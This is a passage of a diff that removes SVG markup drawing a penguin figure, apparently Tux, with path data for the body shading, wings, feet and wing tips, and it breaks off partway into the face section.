-				d="m 83.13,74 c -0.9,1.13 -1.48,2.49 -1.84,3.89 -0.35,1.4 -0.48,2.85 -0.54,4.3 -0.11,2.89 0.07,5.83 -0.7,8.62 -0.82,2.98 -2.65,5.57 -4.44,8.08 -3.11,4.36 -6.25,8.84 -7.78,13.97 -0.93,3.1 -1.24,6.39 -0.91,9.62 -3.47,5.1 -6.48,10.53 -8.98,16.18 -3.78,8.57 -6.37,17.69 -7.28,27.01 -1.12,11.41 0.34,23.15 4.85,33.69 3.25,7.63 8.11,14.6 14.38,20.04 3.18,2.76 6.72,5.11 10.5,6.97 13.11,6.45 29.31,6.46 42.2,-0.41 6.74,-3.59 12.43,-8.84 17.91,-14.15 3.3,-3.2 6.59,-6.48 9.11,-10.32 4.85,-7.41 6.54,-16.41 7.59,-25.2 1.83,-15.36 1.89,-31.6 -4.85,-45.53 -2.32,-4.8 -5.41,-9.22 -9.12,-13.05 -0.98,-6.7 -2.93,-13.27 -5.76,-19.42 -2.05,-4.45 -4.54,-8.68 -6.44,-13.18 -0.78,-1.85 -1.46,-3.75 -2.32,-5.56 -0.87,-1.81 -1.93,-3.55 -3.39,-4.94 -1.48,-1.42 -3.33,-2.43 -5.28,-3.07 -1.95,-0.65 -4.01,-0.94 -6.06,-1.04 -4.11,-0.21 -8.22,0.33 -12.33,0.16 -3.27,-0.13 -6.53,-0.7 -9.8,-0.51 -1.63,0.1 -3.26,0.39 -4.78,1.01 -1.52,0.61 -2.92,1.56 -3.94,2.84 z"/>
-			<g id="body_self_shadows">
-				<path id="belly_shadow_left" opacity="0.25" fill="url(#fill_belly_shadow_left)" filter="url(#blur_belly_shadow_left)" clip-path="url(#clip_body)"
-					d="m 68.67,115.18 c 0.87,1.31 -0.55,5.84 19.86,2.94 0,0 -3.59,0.39 -7.12,1.21 -5.49,1.84 -10.27,3.89 -13.97,6.61 -3.65,2.7 -6.33,6.21 -9.68,9.22 0,0 5.43,-9.92 6.78,-12.91 1.36,-2.99 -0.22,-2.85 0.85,-7.25 1.07,-4.4 3.69,-8.63 3.69,-8.63 0,0 -2.14,6.22 -0.41,8.81 z"/>
-				<path id="belly_shadow_right" opacity="0.42" fill="url(#fill_belly_shadow_right)" filter="url(#blur_belly_shadow_right)" clip-path="url(#clip_body)"
-					d="m 134.28,113.99 c -4.16,2.9 -6.6,2.56 -11.64,3.12 -5.05,0.57 -18.7,0.36 -18.7,0.36 0,0 1.97,-0.03 6.36,0.78 4.38,0.82 13.31,1.6 18.34,3.51 5.04,1.92 6.87,2.47 9.93,4.4 4.35,2.75 7.55,7.06 11.71,10.08 0,0 0.2,-4 -1.48,-6.99 -1.68,-2.99 -6.2,-7.7 -7.53,-12.1 -1.32,-4.4 -1.96,-13.04 -1.96,-13.04 0,0 -0.88,6.99 -5.03,9.88 z"/>
-				<path id="belly_shadow_middle" opacity="0.2" fill="url(#fill_belly_shadow_middle)" filter="url(#blur_belly_shadow_middle)" clip-path="url(#clip_body)"
-					d="m 95.17,107.81 c -0.16,1.25 -0.36,2.5 -0.6,3.74 -0.12,0.61 -0.26,1.22 -0.48,1.8 -0.23,0.58 -0.56,1.14 -1.02,1.55 -0.41,0.37 -0.9,0.62 -1.4,0.85 -1.94,0.88 -4.01,1.47 -6.12,1.74 0.84,0.06 1.68,0.14 2.53,0.23 0.53,0.06 1.06,0.12 1.57,0.25 0.52,0.14 1.03,0.34 1.46,0.65 0.47,0.35 0.84,0.82 1.12,1.34 0.55,1.02 0.73,2.2 0.83,3.37 0.13,1.48 0.14,2.98 0.03,4.46 0.1,-0.99 0.31,-1.98 0.62,-2.92 0.57,-1.72 1.47,-3.32 2.69,-4.65 0.49,-0.52 1.02,-1.01 1.6,-1.42 1.79,-1.26 4.07,-1.81 6.24,-1.51 -2.21,0.09 -4.44,-0.6 -6.2,-1.93 -0.9,-0.68 -1.68,-1.52 -2.22,-2.5 -0.84,-1.52 -1.08,-3.37 -0.65,-5.05 z"/>
-				<path id="belly_shadow_lower" opacity="0.11" fill="#000000" filter="url(#blur_belly_shadow_lower)" clip-path="url(#clip_body)"
-					d="m 89.85,137.14 c -1.06,4.03 -1.79,8.15 -2.17,12.31 -0.55,5.87 -0.42,11.78 -0.74,17.67 -0.26,4.99 -0.85,10.04 0.02,14.97 0.41,2.35 1.15,4.64 2.2,6.78 0.16,-0.82 0.29,-1.64 0.36,-2.47 0.37,-4 -0.3,-8.01 -0.53,-12.01 -0.4,-7.02 0.57,-14.04 0.97,-21.06 0.3,-5.39 0.27,-10.8 -0.11,-16.19 z"/>
-			</g>
-			<g id="body_glare">
-				<path id="belly_glare" opacity="0.75" fill="#7c7c7c" filter="url(#blur_belly_glare)" clip-path="url(#clip_body)"
-					d="m 160.08,131.23 c 1.03,-0.16 7.34,5.21 6.48,7.21 -0.86,1.99 -2.49,0.79 -3.65,0.8 -1.16,0.02 -4.33,1.46 -4.86,0.55 -0.54,-0.91 1.4,-3.03 2.41,-4.81 0.82,-1.43 -1.4,-3.59 -0.38,-3.75 z"/>
-				<path id="head_glare" fill="#7c7c7c" filter="url(#blur_head_glare)" clip-path="url(#clip_body)"
-					d="m 121.52,11.12 c -2.21,1.56 -1.25,3.51 -0.3,5.46 0.95,1.96 -2.09,7.59 -2.12,7.83 -0.03,0.24 5.98,-2.85 7.62,-4.87 1.94,-2.37 6.83,3.22 6.56,2.37 0.01,-1.52 -9.55,-12.34 -11.76,-10.79 z"/>
-				<path id="neck_glare" fill="#838384" filter="url(#blur_neck_glare)" clip-path="url(#clip_body)"
-					d="m 138.27,76.63 c -1.86,1.7 0.88,4.25 2.17,7.24 0.81,1.86 3.04,4.49 5.2,4.07 1.63,-0.32 2.63,-2.66 2.48,-4.3 -0.3,-3.18 -2.98,-3.93 -4.93,-5.02 -1.54,-0.86 -3.61,-3.18 -4.92,-1.99 z"/>
-			</g>
-		</g>
-		<g id="wings">
-			<g id="wing_left">
-				<path id="wing_left_base" fill="#020204"
-					d="m 63.98,100.91 c -6.1,6.92 -12.37,13.63 -15.81,21.12 -1.71,3.8 -2.51,7.93 -3.68,11.93 -1.32,4.54 -3.12,8.94 -5.14,13.22 -1.87,3.95 -3.93,7.81 -5.98,11.66 -1.5,2.81 -3.02,5.67 -3.54,8.81 -0.41,2.48 -0.18,5.04 0.46,7.47 0.63,2.43 1.64,4.75 2.79,6.98 4.88,9.55 12.21,17.77 20.89,24.07 3.94,2.85 8.15,5.32 12.58,7.35 2.4,1.09 4.92,2.07 7.56,2.11 1.32,0.03 2.65,-0.19 3.86,-0.72 1.2,-0.53 2.28,-1.38 3,-2.49 0.88,-1.36 1.18,-3.05 1,-4.66 -0.18,-1.61 -0.81,-3.15 -1.65,-4.53 -2.06,-3.38 -5.31,-5.83 -8.44,-8.25 -6.76,-5.23 -13.29,-10.76 -19.55,-16.58 -1.76,-1.65 -3.53,-3.34 -4.76,-5.42 -1.2,-2.02 -1.85,-4.32 -2.29,-6.63 -1.21,-6.33 -0.9,-12.99 1.25,-19.07 0.85,-2.38 1.96,-4.65 3.04,-6.93 1.86,-3.95 3.62,-7.98 6.07,-11.6 3.05,-4.51 7.13,-8.33 9.61,-13.17 2.1,-4.09 2.95,-8.68 3.76,-13.2 0.64,-3.54 1.85,-7 2.47,-10.54 -1.21,2.3 -5.11,6.07 -7.5,9.07 z"/>
-				<path id="wing_left_glare" opacity="0.95" fill="#7c7c7c" filter="url(#blur_wing_left_glare)" clip-path="url(#clip_wing_left)"
-					d="m 56.96,126.1 c -2,1.84 -3.73,3.97 -5.13,6.31 -2.3,3.84 -3.65,8.16 -5.33,12.31 -1.24,3.09 -2.69,6.2 -2.86,9.53 -0.09,1.71 0.16,3.42 0.22,5.13 0.06,1.71 -0.1,3.49 -0.94,4.98 -0.7,1.25 -1.87,2.23 -3.22,2.71 1.83,0.61 3.45,1.79 4.6,3.33 0.96,1.3 1.58,2.81 2.41,4.18 0.68,1.12 1.51,2.16 2.54,2.97 1.02,0.82 2.25,1.4 3.54,1.56 1.79,0.23 3.65,-0.36 4.97,-1.58 -1.66,-15.55 -0.14,-31.42 4.44,-46.37 0.29,-0.94 0.59,-1.89 0.67,-2.87 0.07,-0.99 -0.12,-2.03 -0.72,-2.81 -0.31,-0.42 -0.74,-0.75 -1.23,-0.96 -0.48,-0.2 -1.02,-0.28 -1.54,-0.21 -0.52,0.06 -1.03,0.26 -1.45,0.57 -0.42,0.32 -0.76,0.74 -0.97,1.22 z"/>
-			</g>
-			<g id="wing_right">
-				<path id="wing_right_base" fill="#020204"
-					d="m 162.76,127.12 c 5.24,4.22 8.57,10.59 9.6,17.24 0.8,5.18 0.28,10.51 -0.89,15.62 -1.17,5.12 -2.97,10.06 -4.77,15 -0.71,1.96 -1.43,3.95 -1.71,6.02 -0.29,2.08 -0.11,4.27 0.89,6.11 1.15,2.11 3.29,3.56 5.59,4.24 2.27,0.68 4.72,0.66 7.02,0.09 2.3,-0.57 6.17,-1.31 8.04,-2.77 4.75,-3.69 5.88,-10.1 7.01,-15.72 1.17,-5.87 0.6,-12.02 -0.43,-17.95 -1.41,-8.09 -3.78,-15.99 -6.79,-23.62 -2.22,-5.62 -5.06,-10.98 -8.44,-15.96 -3.32,-4.89 -8.02,-8.7 -11.5,-13.48 -1.21,-1.66 -2.66,-3.38 -3.84,-5.06 -2.56,-3.62 -1.98,-2.94 -3.57,-5.29 -1.15,-1.7 -2.97,-2.28 -4.88,-3.02 -1.92,-0.74 -4.06,-0.96 -6.04,-0.41 -2.6,0.73 -4.73,2.79 -5.86,5.24 -1.13,2.46 -1.33,5.28 -0.89,7.95 0.57,3.44 2.14,6.64 3.92,9.64 2,3.39 4.32,6.66 7.35,9.18 3.16,2.63 6.98,4.37 10.19,6.95 z"/>
-				<path id="wing_right_glare" fill="#838384" filter="url(#blur_wing_right_glare)" clip-path="url(#clip_wing_right)"
-					d="m 150.42,118.99 c 0.42,0.4 0.86,0.81 1.31,1.19 3.22,2.63 4.93,5.58 8.2,8.16 5.34,4.22 10.75,11.5 11.8,18.15 0.82,5.19 -0.26,8.01 -1.58,14.12 -1.32,6.12 -5.06,14.78 -7.09,20.68 -0.8,2.35 1.64,1.38 1.32,3.86 -0.16,1.22 -0.18,2.45 -0.03,3.67 0.02,-0.23 0.03,-0.48 0.06,-0.71 0.39,-3.38 1.42,-6.63 2.55,-9.82 2.17,-6.13 4.66,-12.15 6.38,-18.45 1.72,-6.29 1.53,-10.82 0.63,-16.23 -1.13,-6.81 -5.09,-13.09 -10.69,-17.24 -3.97,-2.93 -8.64,-4.81 -12.86,-7.38 z"/>
-			</g>
-		</g>
-		<g id="feet">
-			<g id="foot_left">
-				<path id="foot_left_base" fill="url(#fill_foot_left_base)"
-					d="m 34.98,175.33 c 1.38,-0.57 2.93,-0.68 4.39,-0.41 1.47,0.27 2.86,0.91 4.09,1.74 2.47,1.68 4.3,4.12 6.05,6.54 4.03,5.54 7.9,11.2 11.42,17.08 2.85,4.78 5.46,9.71 8.76,14.18 2.15,2.93 4.57,5.64 6.73,8.55 2.16,2.92 4.07,6.08 5.03,9.58 1.25,4.55 0.76,9.56 -1.4,13.75 -1.52,2.95 -3.86,5.48 -6.7,7.19 -2.84,1.71 -5.83,2.47 -9.15,2.47 -5.27,0 -10.42,-2.83 -15.32,-4.78 -9.98,-3.98 -20.82,-5.22 -31.11,-8.32 -3.16,-0.95 -6.27,-2.08 -9.45,-2.95 -1.42,-0.39 -2.85,-0.73 -4.19,-1.34 -1.34,-0.6 -2.59,-1.51 -3.33,-2.77 -0.57,-0.98 -0.8,-2.13 -0.8,-3.26 0,-1.14 0.28,-2.26 0.67,-3.32 0.77,-2.13 2.02,-4.06 2.86,-6.17 1.37,-3.44 1.62,-7.23 1.43,-10.93 -0.18,-3.69 -0.78,-7.36 -1.03,-11.05 -0.12,-1.65 -0.16,-3.32 0.16,-4.95 0.31,-1.62 1.01,-3.21 2.2,-4.35 1.1,-1.06 2.55,-1.69 4.05,-2 1.49,-0.31 3.03,-0.32 4.55,-0.29 1.52,0.03 3.05,0.12 4.57,-0.01 1.52,-0.12 3.05,-0.46 4.37,-1.22 1.26,-0.72 2.29,-1.79 3.14,-2.96 0.85,-1.17 1.54,-2.45 2.25,-3.72 0.7,-1.26 1.43,-2.52 2.36,-3.64 0.92,-1.12 2.06,-2.09 3.4,-2.64 z"/>
-				<path id="foot_left_layer_1" fill="#d99a03" filter="url(#blur_foot_left_layer_1)" clip-path="url(#clip_foot_left)"
-					d="m 37.16,177.7 c 1.25,-0.5 2.67,-0.56 3.98,-0.26 1.32,0.3 2.55,0.94 3.61,1.77 2.14,1.65 3.62,3.97 5.05,6.26 3.42,5.54 6.76,11.15 9.92,16.86 2.4,4.31 4.68,8.7 7.62,12.65 1.95,2.62 4.18,5.03 6.17,7.62 1.99,2.59 3.76,5.41 4.64,8.56 1.14,4.05 0.68,8.54 -1.28,12.26 -1.42,2.68 -3.58,4.96 -6.2,6.48 -2.61,1.52 -5.67,2.28 -8.69,2.14 -4.82,-0.22 -9.23,-2.63 -13.77,-4.26 -8.71,-3.16 -18.14,-3.59 -27.08,-6.05 -3.2,-0.87 -6.32,-2.03 -9.53,-2.84 -1.43,-0.36 -2.88,-0.66 -4.23,-1.23 -1.35,-0.57 -2.62,-1.45 -3.36,-2.72 -0.54,-0.95 -0.76,-2.06 -0.73,-3.15 0.04,-1.09 0.31,-2.17 0.7,-3.19 0.78,-2.04 2,-3.88 2.78,-5.92 1.19,-3.08 1.34,-6.47 1.12,-9.76 -0.22,-3.29 -0.8,-6.56 -1,-9.85 -0.08,-1.48 -0.1,-2.97 0.2,-4.41 0.3,-1.45 0.93,-2.85 1.98,-3.89 1.14,-1.13 2.7,-1.74 4.29,-1.99 1.58,-0.24 3.19,-0.13 4.78,0.01 1.6,0.14 3.2,0.32 4.8,0.23 1.6,-0.1 3.22,-0.49 4.54,-1.39 1.2,-0.81 2.1,-2 2.79,-3.27 0.69,-1.27 1.18,-2.64 1.71,-3.98 0.52,-1.35 1.09,-2.69 1.91,-3.89 0.82,-1.19 1.93,-2.24 3.28,-2.79 z"/>
-				<path id="foot_left_layer_2" fill="#f5bd0c" filter="url(#blur_foot_left_layer_2)" clip-path="url(#clip_foot_left)"
-					d="m 35.99,174.57 c 1.22,-0.6 2.65,-0.72 3.98,-0.45 1.33,0.27 2.57,0.92 3.62,1.77 2.09,1.7 3.43,4.13 4.67,6.51 2.84,5.46 5.5,11.04 8.9,16.19 2.48,3.73 5.33,7.2 7.83,10.92 3.39,5.03 6.15,10.57 7.29,16.5 0.76,4 0.74,8.31 -1.18,11.9 -1.27,2.37 -3.32,4.31 -5.75,5.52 -2.42,1.22 -5.21,1.71 -7.92,1.47 -4.27,-0.37 -8.14,-2.47 -12.16,-3.94 -7.13,-2.59 -14.84,-3.22 -22.18,-5.18 -3.09,-0.82 -6.13,-1.89 -9.26,-2.54 -1.39,-0.29 -2.8,-0.5 -4.12,-1 -1.32,-0.5 -2.57,-1.33 -3.25,-2.55 -0.47,-0.86 -0.63,-1.86 -0.56,-2.84 0.07,-0.97 0.36,-1.92 0.74,-2.83 0.77,-1.8 1.9,-3.46 2.49,-5.32 0.88,-2.75 0.52,-5.72 -0.14,-8.53 -0.65,-2.8 -1.6,-5.55 -1.89,-8.41 -0.13,-1.27 -0.13,-2.57 0.17,-3.82 0.29,-1.25 0.88,-2.45 1.81,-3.34 1.2,-1.15 2.88,-1.73 4.56,-1.89 1.67,-0.16 3.35,0.06 5.01,0.3 1.66,0.24 3.34,0.5 5.01,0.42 1.68,-0.07 3.39,-0.51 4.7,-1.54 1.3,-1.02 2.12,-2.53 2.59,-4.09 0.47,-1.57 0.62,-3.2 0.81,-4.82 0.19,-1.62 0.43,-3.26 1.06,-4.77 0.63,-1.51 1.69,-2.9 3.17,-3.64 z"/>
-				<path id="foot_left_glare" fill="url(#fill_foot_left_glare)" filter="url(#blur_foot_left_glare)" clip-path="url(#clip_foot_left)"
-					d="m 51.2,188.21 c 2.25,4.06 3.62,8.72 5.85,12.82 2.05,3.77 4.38,7.65 6.46,11.12 0.93,1.55 3.09,3.93 5.27,7.62 1.98,3.34 3.98,8.01 5.1,9.58 -0.64,-1.84 -1.96,-6.77 -3.54,-10.28 -1.47,-3.28 -3.19,-5.15 -4.24,-6.92 -2.08,-3.47 -4.33,-6.6 -6.47,-9.91 -2.95,-4.57 -5.2,-9.68 -8.43,-14.03 z"/>
-			</g>
-			<g id="foot_right">
-				<path id="foot_right_shadow" opacity="0.2" fill="url(#fill_foot_right_shadow)" filter="url(#blur_foot_right_shadow)" clip-path="url(#clip_body)"
-					d="m 198.7,215.61 c -0.4,1.33 -1.02,2.62 -1.81,3.8 -1.75,2.59 -4.3,4.55 -6.84,6.35 -4.33,3.07 -8.85,5.89 -12.89,9.38 -2.7,2.34 -5.17,4.97 -7.45,7.73 -1.95,2.36 -3.79,4.84 -6.02,6.94 -2.25,2.12 -4.89,3.84 -7.74,4.77 -3.47,1.13 -7.13,1.08 -10.47,0.22 -2.34,-0.6 -4.63,-1.64 -6.08,-3.53 -1.45,-1.89 -1.92,-4.44 -2.09,-6.94 -0.3,-4.42 0.23,-8.93 0.71,-13.42 0.4,-3.73 0.77,-7.46 0.92,-11.18 0.27,-6.77 -0.18,-13.47 -1.09,-20.05 -0.16,-1.11 -0.32,-2.22 -0.23,-3.35 0.09,-1.14 0.47,-2.32 1.27,-3.2 0.74,-0.81 1.77,-1.29 2.79,-1.52 1.02,-0.24 2.06,-0.25 3.09,-0.28 2.43,-0.06 4.86,-0.21 7.25,0.01 1.51,0.13 2.99,0.41 4.49,0.55 2.51,0.24 5.12,0.12 7.64,-0.62 2.71,-0.8 5.29,-2.29 8.05,-2.7 1.13,-0.17 2.26,-0.15 3.36,0.01 1.12,0.15 2.24,0.46 3.1,1.15 0.66,0.52 1.14,1.23 1.51,1.99 0.56,1.14 0.9,2.39 1.1,3.68 0.17,1.14 0.24,2.31 0.53,3.41 0.48,1.81 1.58,3.35 2.89,4.6 1.32,1.25 2.85,2.24 4.39,3.22 1.53,0.97 3.07,1.93 4.7,2.73 0.77,0.38 1.56,0.72 2.29,1.15 0.74,0.44 1.42,0.97 1.91,1.67 0.66,0.95 0.92,2.2 0.72,3.43 z"/>
-				<path id="foot_right_base" fill="url(#fill_foot_right_base)"
-					d="m 213.47,222.92 c -2.26,2.68 -5.4,4.45 -8.53,6.05 -5.33,2.71 -10.86,5.1 -15.87,8.37 -3.36,2.19 -6.46,4.76 -9.36,7.53 -2.48,2.37 -4.83,4.9 -7.61,6.91 -2.81,2.03 -6.05,3.5 -9.48,4.01 -0.95,0.14 -1.9,0.21 -2.86,0.21 -3.24,0 -6.48,-0.78 -9.46,-2.08 -2.7,-1.17 -5.3,-2.86 -6.86,-5.36 -1.56,-2.52 -1.92,-5.59 -1.92,-8.56 -0.01,-5.23 0.96,-10.41 1.87,-15.57 0.76,-4.29 1.48,-8.58 1.95,-12.91 0.85,-7.86 0.84,-15.81 0.28,-23.71 -0.1,-1.32 -0.21,-2.65 -0.01,-3.96 0.2,-1.31 0.74,-2.62 1.74,-3.48 0.93,-0.8 2.17,-1.16 3.4,-1.22 1.22,-0.07 2.44,0.12 3.65,0.3 2.85,0.42 5.73,0.74 8.52,1.48 1.76,0.46 3.48,1.08 5.23,1.56 2.94,0.79 6.01,1.17 9.02,0.82 3.25,-0.38 6.41,-1.6 9.68,-1.52 1.34,0.03 2.67,0.28 3.95,0.69 1.3,0.41 2.59,1 3.55,1.98 0.73,0.74 1.24,1.67 1.62,2.64 0.57,1.44 0.88,2.98 1.01,4.52 0.11,1.37 0.09,2.76 0.35,4.11 0.43,2.21 1.6,4.24 3.04,5.97 1.45,1.74 3.18,3.21 4.91,4.66 1.73,1.45 3.46,2.89 5.32,4.16 0.87,0.6 1.77,1.16 2.6,1.81 0.83,0.66 1.59,1.42 2.11,2.34 0.45,0.81 0.69,1.72 0.69,2.65 0,0.52 -0.07,1.04 -0.23,1.56 -0.45,1.43 -1.28,2.82 -2.3,4.04 z"/>
-				<path id="foot_right_layer_1" fill="#cd8907" filter="url(#blur_foot_right_layer_1)" clip-path="url(#clip_foot_right)"
-					d="m 213.21,216.12 c -0.53,1.33 -1.28,2.58 -2.22,3.67 -2.07,2.42 -4.93,4.01 -7.78,5.44 -4.88,2.44 -9.92,4.58 -14.5,7.52 -3.06,1.97 -5.9,4.28 -8.55,6.78 -2.26,2.13 -4.41,4.41 -6.95,6.21 -2.57,1.83 -5.53,3.14 -8.65,3.6 -3.8,0.56 -7.72,-0.16 -11.25,-1.67 -2.46,-1.06 -4.84,-2.56 -6.27,-4.83 -1.42,-2.26 -1.75,-5.02 -1.75,-7.69 -0.02,-4.71 0.87,-9.37 1.71,-14 0.7,-3.85 1.36,-7.71 1.78,-11.6 0.76,-7.08 0.73,-14.22 0.25,-21.32 -0.08,-1.19 -0.17,-2.39 0.01,-3.57 0.18,-1.18 0.67,-2.35 1.57,-3.13 0.85,-0.73 1.99,-1.05 3.11,-1.1 1.11,-0.06 2.22,0.12 3.33,0.28 2.61,0.38 5.23,0.67 7.78,1.33 1.61,0.42 3.18,0.98 4.78,1.4 2.68,0.72 5.49,1.06 8.24,0.74 2.97,-0.34 5.85,-1.44 8.83,-1.37 1.23,0.03 2.44,0.26 3.61,0.62 1.19,0.37 2.37,0.9 3.25,1.78 0.66,0.67 1.11,1.51 1.48,2.38 0.53,1.29 0.89,2.67 0.91,4.07 0.03,1.46 -0.28,2.92 -0.09,4.37 0.16,1.17 0.66,2.28 1.3,3.28 0.63,1 1.4,1.91 2.17,2.81 1.48,1.75 2.96,3.53 4.82,4.87 2.11,1.53 4.62,2.43 6.8,3.85 0.65,0.43 1.28,0.91 1.74,1.54 0.78,1.06 0.98,2.5 0.54,3.74 z"/>
-				<path id="foot_right_layer_2" fill="#f5c021" filter="url(#blur_foot_right_layer_2)" clip-path="url(#clip_foot_right)"
-					d="m 212.91,214.61 c -0.6,1.35 -1.37,2.6 -2.28,3.71 -2.12,2.58 -4.99,4.35 -8,5.49 -4.97,1.88 -10.39,2.13 -15.26,4.27 -2.97,1.3 -5.65,3.26 -8.36,5.12 -2.18,1.49 -4.42,2.94 -6.82,3.98 -2.72,1.19 -5.6,1.85 -8.5,2.32 -1.84,0.29 -3.71,0.51 -5.57,0.41 -1.86,-0.1 -3.72,-0.54 -5.37,-1.49 -1.24,-0.72 -2.36,-1.75 -3.03,-3.1 -0.73,-1.49 -0.86,-3.24 -0.85,-4.94 0.05,-4.5 1.02,-8.96 0.99,-13.47 -0.03,-3.93 -0.81,-7.8 -1.03,-11.72 -0.43,-7.54 1.19,-15.2 -0.24,-22.59 -0.22,-1.19 -0.53,-2.37 -0.52,-3.58 0.01,-0.6 0.1,-1.21 0.31,-1.77 0.22,-0.55 0.56,-1.06 1.01,-1.42 0.39,-0.29 0.84,-0.47 1.31,-0.56 0.46,-0.08 0.94,-0.06 1.41,0.01 0.93,0.15 1.82,0.51 2.73,0.78 2.6,0.78 5.35,0.76 8,1.35 1.66,0.36 3.26,0.97 4.91,1.41 2.75,0.76 5.63,1.08 8.46,0.75 3.04,-0.36 6.01,-1.46 9.07,-1.38 1.26,0.03 2.5,0.26 3.71,0.62 1.21,0.36 2.42,0.87 3.34,1.8 0.65,0.67 1.13,1.52 1.51,2.4 0.57,1.29 0.96,2.69 0.95,4.11 -0.01,0.74 -0.12,1.47 -0.19,2.21 -0.06,0.74 -0.08,1.49 0.09,2.2 0.18,0.72 0.55,1.37 0.97,1.96 0.42,0.59 0.9,1.12 1.34,1.7 1.22,1.61 2.1,3.49 3.05,5.3 0.95,1.81 2.02,3.6 3.53,4.91 2.05,1.77 4.7,2.48 6.99,3.89 0.67,0.41 1.31,0.89 1.78,1.55 0.38,0.52 0.63,1.15 0.73,1.81 0.09,0.65 0.03,1.34 -0.17,1.96 z"/>
-				<path id="foot_right_glare" fill="url(#fill_foot_right_glare)" filter="url(#blur_foot_right_glare)" clip-path="url(#clip_foot_right)"
-					d="m 148.08,181.58 c 2.82,-0.76 5.22,1.38 7.27,2.99 1.32,1.13 3.24,0.85 4.86,0.9 2.69,-0.09 5.36,0.45 8.05,0.12 5.3,-0.45 10.49,-1.75 15.81,-1.97 2.54,-0.16 5.4,-0.31 7.59,1.17 0.89,0.62 2.2,3.23 3.07,2.25 -0.36,-2.74 -2.39,-5.39 -5.11,-6.12 -2.14,-0.34 -4.3,0.25 -6.46,0.06 -6.39,-0.15 -12.75,-1.34 -19.16,-1 -4.46,0.04 -8.91,-0.17 -13.37,-0.34 -1.75,-0.36 -2.37,1.19 -3.32,1.79 0.25,0.19 0.34,0.25 0.77,0.15 z"/>
-			</g>
-		</g>
-		<g id="wing_tip_right">
-			<g id="wing_tip_right_shadow">
-				<path id="wing_tip_right_shadow_lower" opacity="0.35" fill="url(#fill_wing_tip_right_shadow_lower)" filter="url(#blur_wing_tip_right_shadow_lower)" clip-path="url(#clip_foot_right)"
-					d="m 185.49,187.61 c -0.48,-0.95 -1.36,-1.66 -2.35,-2.07 -0.98,-0.41 -2.06,-0.55 -3.13,-0.54 -2.13,0.02 -4.25,0.57 -6.38,0.39 -1.79,-0.16 -3.49,-0.83 -5.24,-1.26 -1.81,-0.44 -3.73,-0.61 -5.52,-0.12 -1.92,0.52 -3.61,1.81 -4.67,3.49 -0.94,1.48 -1.38,3.23 -1.52,4.98 -0.14,1.75 0.01,3.5 0.19,5.25 0.12,1.26 0.27,2.52 0.57,3.75 0.31,1.23 0.78,2.43 1.52,3.46 1.07,1.48 2.66,2.54 4.37,3.17 2.8,1.03 5.98,0.98 8.73,-0.15 4.88,-2.12 9.01,-5.92 11.52,-10.6 0.91,-1.68 1.61,-3.47 2.06,-5.31 0.18,-0.74 0.32,-1.49 0.32,-2.25 0.01,-0.75 -0.12,-1.52 -0.47,-2.19 z"/>
-				<path id="wing_tip_right_shadow_upper" opacity="0.35" fill="url(#fill_wing_tip_right_shadow_upper)" filter="url(#blur_wing_tip_right_shadow_upper)" clip-path="url(#clip_foot_right)"
-					d="m 185.49,184.89 c -0.48,-0.69 -1.36,-1.2 -2.35,-1.5 -0.98,-0.3 -2.06,-0.39 -3.13,-0.39 -2.13,0.02 -4.25,0.42 -6.38,0.28 -1.79,-0.11 -3.49,-0.6 -5.24,-0.9 -1.81,-0.32 -3.73,-0.45 -5.52,-0.09 -1.92,0.37 -3.61,1.3 -4.67,2.52 -0.94,1.07 -1.38,2.34 -1.52,3.6 -0.14,1.26 0.01,2.53 0.19,3.79 0.12,0.91 0.27,1.83 0.57,2.72 0.31,0.89 0.78,1.76 1.52,2.5 1.07,1.07 2.66,1.83 4.37,2.29 2.8,0.75 5.98,0.71 8.73,-0.11 4.88,-1.53 9.01,-4.28 11.52,-7.66 0.91,-1.22 1.61,-2.51 2.06,-3.84 0.18,-0.54 0.32,-1.08 0.32,-1.62 0.01,-0.55 -0.12,-1.11 -0.47,-1.59 z"/>
-			</g>
-			<path id="wing_tip_right_base" fill="#020204"
-				d="m 189.55,178.72 c -0.35,-0.95 -0.97,-1.79 -1.72,-2.47 -0.75,-0.68 -1.64,-1.2 -2.57,-1.6 -1.86,-0.79 -3.89,-1.09 -5.89,-1.46 -1.87,-0.35 -3.74,-0.78 -5.62,-1.1 -1.96,-0.33 -3.98,-0.55 -5.92,-0.11 -1.69,0.38 -3.26,1.26 -4.54,2.43 -1.28,1.17 -2.28,2.63 -3,4.21 -1.27,2.79 -1.67,5.92 -1.43,8.97 0.18,2.27 0.76,4.61 2.25,6.32 1.21,1.39 2.92,2.26 4.68,2.78 3.04,0.9 6.35,0.85 9.36,-0.13 4.97,-1.67 9.37,-4.98 12.35,-9.29 0.98,-1.43 1.82,-2.98 2.2,-4.66 0.29,-1.28 0.3,-2.66 -0.15,-3.89 z"/>
-			<g id="wing_tip_right_glare">
-				<defs>
-					<path id="path_wing_tip_right_glare"
-						d="m 168.89,171.07 c -0.47,0.03 -0.93,0.08 -1.4,0.17 -2.99,0.53 -5.73,2.42 -7.27,5.03 -1.09,1.85 -1.58,4.03 -1.43,6.17 0.07,-1.5 0.46,-2.97 1.19,-4.28 1.23,-2.23 3.47,-3.91 5.98,-4.37 1.54,-0.28 3.13,-0.11 4.68,0.08 1.5,0.19 3,0.39 4.47,0.7 2.28,0.5 4.53,1.26 6.44,2.59 0.44,0.31 0.86,0.66 1.21,1.08 0.35,0.41 0.62,0.89 0.73,1.42 0.15,0.78 -0.07,1.6 -0.46,2.29 -0.39,0.7 -0.92,1.3 -1.48,1.86 -0.46,0.46 -0.94,0.89 -1.43,1.32 2.21,-0.43 4.44,-1.03 6.28,-2.31 0.77,-0.55 1.48,-1.2 1.94,-2.02 0.46,-0.83 0.65,-1.83 0.43,-2.75 -0.16,-0.62 -0.5,-1.19 -0.92,-1.67 -0.42,-0.48 -0.93,-0.87 -1.45,-1.24 -2.31,-1.62 -5.01,-2.65 -7.81,-2.99 -1.8,-0.33 -3.61,-0.61 -5.42,-0.83 -1.41,-0.18 -2.86,-0.33 -4.28,-0.25 z"/>
-				</defs>
-				<use id="wing_tip_right_glare_1" href="#path_wing_tip_right_glare" xlink:href="#path_wing_tip_right_glare"
-					fill="url(#fill_wing_tip_right_glare_1)" filter="url(#blur_wing_tip_right_glare)" clip-path="url(#clip_wing_tip_right)"/>
-				<use id="wing_tip_right_glare_2" href="#path_wing_tip_right_glare" xlink:href="#path_wing_tip_right_glare"
-					fill="url(#fill_wing_tip_right_glare_2)" filter="url(#blur_wing_tip_right_glare)" clip-path="url(#clip_wing_tip_right)"/>
-			</g>
-		</g>
-		<g id="face">
-			<g id="eyes">
-				<g id="eye_left">
-					<path id="eyeball_left" fill="url(#fill_eyeball_left)"
